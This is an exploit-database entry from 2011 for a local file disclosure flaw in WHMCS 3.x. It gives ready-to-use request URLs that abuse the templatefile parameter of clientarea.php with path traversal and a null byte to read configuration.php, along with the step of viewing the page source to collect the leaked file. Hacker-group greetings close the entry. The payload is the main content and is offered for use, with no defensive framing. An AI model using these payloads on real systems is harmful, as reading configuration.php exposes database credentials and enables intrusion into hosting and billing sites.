id: 17049
date: 11/03/2011
title: WHMCS 3.x.x (clientarea.php) Local File Disclosure
author: red virus
cves: 

# Title      : WHMCS (clientarea.php) Local File Disclosure
 
# Author     : Red Virus >>>c3o@w.cn
 
# Product    : WHMCS ( WHMCompleteSolution )
# Vendor     : http://whmcs.com/
# Date       : 11/04/2011
# Version    : 3.X.x
# Tested on  : linux+apache
# Homepage   : www.alm3refh.com
================================================================
 
  
http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
  
http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00
  
show the page source to see Disclosure file
  
 
================================================================
 
Greetz To .
 >>> alm3refh.com - tryag.cc - joood
T3rr0rist & cyb3r-1st & i-Hmx & h311 c0d3
infofst & virus hima & Karar aLShaMi  & all alm3refh group
ahwak2000 & reno & amr2006 & b0x & ZombiE_KsA



#  0day.today [2023-03-25]  #